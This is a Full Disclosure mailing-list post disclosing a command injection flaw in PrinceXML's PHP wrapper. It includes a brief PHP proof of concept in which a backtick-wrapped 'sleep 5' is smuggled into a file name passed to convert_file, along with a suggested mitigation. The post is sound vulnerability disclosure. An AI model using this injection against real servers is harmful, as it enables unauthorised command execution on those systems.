Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

PrinceXML PHP wrapper command injection

From: Brandon Perry <bperry.volatile () gmail com>
Date: Tue, 5 Jul 2016 08:30:34 -0500
While grabbing a copy PrinceXML, I noticed the company also offered some wrapper classes in various languages for using 
prince in server applications (web applications).

http://www.princexml.com/download/wrappers/ <http://www.princexml.com/download/wrappers/>

Taking a quick look at the PHP class, there are likely numerous command injection vulnerabilities. I was able to prove 
a quick PoC out. Some quick googling yielded more results that expected, so PrinceXML and PHP seem kind of popular?

<?php
ini_set('display_errors', '1');
error_reporting(-1);

require 'prince.php';

$exepath='/usr/bin/prince';
$prince= new Prince($exepath);

$prince->setHTML(TRUE);
$prince->setLog('prince.log');

$xmlPath='/Applications/MAMP/htdocs/test/new`sleep 5`html.html';

$msgs= array();
$convert=$prince->convert_file($xmlPath, $msgs);

?>

——————

Note how $xmlPath has bash ticks in it to call sleep. Passing an attacker-controlled file name to the convert_file 
function can result in command injection.

You can use this safely. Using the temporary file mechanisms in PHP to save the user’s file to a randomly named file on 
the FS, then passing this random name you can trust to convert_file would be fine. That being said, I have no idea what 
the common permutations of code is for the PrinceXML PHP library and haven’t looked for any more. It seems obvious 
there will be more vectors.

I haven’t looked at the others. If C# and Java are using the correct classes such as invoking an array of strings as 
the command and arguments as opposed to a straight up concatenated string, they may be safe. The Rails wrapper seems 
unofficial.

I also started getting really sad while working on this and had to listen to Purple Rain. RIP

Attachment: signature.asc
Description: Message signed with OpenPGP using GPGMail


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: